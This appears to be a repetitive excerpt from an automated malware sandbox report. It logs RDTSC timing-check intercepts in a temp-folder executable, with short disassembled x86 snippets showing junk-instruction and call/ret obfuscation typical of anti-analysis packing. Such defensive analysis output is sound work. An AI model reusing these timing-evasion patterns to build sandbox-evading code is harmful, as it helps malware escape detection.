Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1042A3F second address: 1042A49 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3460BFB966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1047DC7 second address: 1047E57 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F3460CF07F8h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 clc 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F3460CF07F8h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D17CEh], esi 0x00000033 jmp 00007F3460CF07FAh 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007F3460CF07F8h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 00000017h 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 or dword ptr [ebp+122D2C0Eh], esi 0x0000005a mov ebx, dword ptr [ebp+1245FD54h] 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 push ebx 0x00000065 pop ebx 0x00000066 jmp 00007F3460CF0807h 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1040B8D second address: 1040BB0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3460BFB966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3460BFB974h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1040BB0 second address: 1040C5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0807h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F3460CF07F8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007F3460CF07F8h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 mov dword ptr fs:[00000000h], esp 0x0000004d and edi, dword ptr [ebp+122D3600h] 0x00000053 mov eax, dword ptr [ebp+122D01EDh] 0x00000059 push 00000000h 0x0000005b push ebx 0x0000005c call 00007F3460CF07F8h 0x00000061 pop ebx 0x00000062 mov dword ptr [esp+04h], ebx 0x00000066 add dword ptr [esp+04h], 00000018h 0x0000006e inc ebx 0x0000006f push ebx 0x00000070 ret 0x00000071 pop ebx 0x00000072 ret 0x00000073 push FFFFFFFFh 0x00000075 mov ebx, edi 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007F3460CF0803h 0x0000007f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1041C01 second address: 1041C1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB96Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jng 00007F3460BFB966h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1041D07 second address: 1041D11 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3460CF07F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1043ADF second address: 1043AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1043AE5 second address: 1043AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1043AEA second address: 1043AEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1043AEF second address: 1043AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1043AF5 second address: 1043B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3460BFB978h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1046180 second address: 104619B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3460CF0807h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 104705F second address: 1047066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1047066 second address: 104706C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 104BE70 second address: 104BE74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 104BE74 second address: 104BE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F3460CF07F6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 104BE82 second address: 104BE86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 104BE86 second address: 104BE94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 104BE94 second address: 104BE98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 104BE98 second address: 104BE9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 104BE9E second address: 104BEA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 104BEA4 second address: 104BEA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FE3B55 second address: FE3B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1051A34 second address: 1051A3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1051A3C second address: 1051A4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB96Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1051A4F second address: 1051A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1051BC0 second address: 1051BC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1051BC4 second address: 1051BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1051BCA second address: 1051BD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1051BD0 second address: 1051BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1056119 second address: 105616F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3460BFB976h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 pop ebx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jng 00007F3460BFB974h 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F3460BFB977h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 105616F second address: 1056181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3460CF07FEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10562FB second address: 1056305 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3460BFB966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1056305 second address: 1056339 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F3460CF0801h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push esi 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop esi 0x00000016 jmp 00007F3460CF07FBh 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e push edi 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 105C0CC second address: 105C0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 105C0D3 second address: 105C118 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3460CF0804h 0x00000008 js 00007F3460CF0811h 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F3460CF0809h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F3460CF07FAh 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 105ADF4 second address: 105ADF9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 105ADF9 second address: 105ADFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 105ADFF second address: 105AE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007F3460BFB96Eh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 105B972 second address: 105B98A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F3460CF07F6h 0x00000009 jbe 00007F3460CF07F6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F3460CF07F6h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 105B98A second address: 105B98E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 105B98E second address: 105B9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F3460CF07F6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 105BDAC second address: 105BDB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 105BDB4 second address: 105BDC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1063E7C second address: 1063E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1063E80 second address: 1063E84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1063E84 second address: 1063E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F3460BFB96Eh 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10631C2 second address: 10631CC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3460CF07FEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10631CC second address: 10631DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jo 00007F3460BFB966h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1063301 second address: 1063305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1062990 second address: 106299B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007F3460BFB966h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1063608 second address: 1063615 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3460CF07F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1063615 second address: 1063622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1063622 second address: 106362F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F3460CF07F6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10637A1 second address: 10637BA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F3460BFB970h 0x00000008 pop ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10638EB second address: 10638F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007F3460CF07FCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10638F8 second address: 1063916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F3460BFB977h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1063916 second address: 1063920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1063920 second address: 1063950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3460BFB96Eh 0x0000000b jmp 00007F3460BFB978h 0x00000010 popad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10670EB second address: 1067118 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF07FFh 0x00000007 push ecx 0x00000008 jnl 00007F3460CF07F6h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007F3460CF07FEh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1027406 second address: 1027410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10274EF second address: 1027502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3460CF07FAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1027502 second address: 1027506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 102799B second address: 10279D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F3460CF07F6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push edx 0x0000000f js 00007F3460CF07F6h 0x00000015 pop edx 0x00000016 push esi 0x00000017 jg 00007F3460CF07F6h 0x0000001d pop esi 0x0000001e popad 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 pushad 0x00000024 jmp 00007F3460CF0800h 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10279D3 second address: 1027A3E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3460BFB966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e jc 00007F3460BFB968h 0x00000014 pushad 0x00000015 popad 0x00000016 push ebx 0x00000017 jne 00007F3460BFB966h 0x0000001d pop ebx 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 jmp 00007F3460BFB976h 0x00000029 jmp 00007F3460BFB977h 0x0000002e popad 0x0000002f pop eax 0x00000030 mov ecx, 56FC16B9h 0x00000035 call 00007F3460BFB969h 0x0000003a push eax 0x0000003b push edx 0x0000003c jl 00007F3460BFB968h 0x00000042 push eax 0x00000043 pop eax 0x00000044 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1027A3E second address: 1027A98 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F3460CF0808h 0x0000000f jmp 00007F3460CF07FCh 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push edi 0x0000001a jmp 00007F3460CF07FAh 0x0000001f pop edi 0x00000020 mov eax, dword ptr [eax] 0x00000022 jc 00007F3460CF07FEh 0x00000028 push edx 0x00000029 jnp 00007F3460CF07F6h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 push ebx 0x00000038 pop ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1027A98 second address: 1027A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1027BF6 second address: 1027BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1027BFF second address: 1027C03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1027C03 second address: 1027C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 jc 00007F3460CF07FCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10282DD second address: 10282E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1028553 second address: 1028559 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 102868D second address: 10286F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB96Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b jp 00007F3460BFB97Bh 0x00000011 pushad 0x00000012 jmp 00007F3460BFB971h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007F3460BFB968h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 xor cl, 0000007Bh 0x00000038 lea eax, dword ptr [ebp+1247C0B9h] 0x0000003e mov edi, esi 0x00000040 nop 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10286F0 second address: 10286FA instructions: 0x00000000 rdtsc 0x00000002 js 00007F3460CF07F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10286FA second address: 1028726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB979h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F3460BFB96Ch 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1028726 second address: 100D5C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0802h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a and edx, dword ptr [ebp+122D3754h] 0x00000010 jc 00007F3460CF07FCh 0x00000016 add edx, dword ptr [ebp+122D3790h] 0x0000001c call dword ptr [ebp+122D2CF7h] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F3460CF0804h 0x00000029 jnp 00007F3460CF0800h 0x0000002f jmp 00007F3460CF07FAh 0x00000034 rdtsc
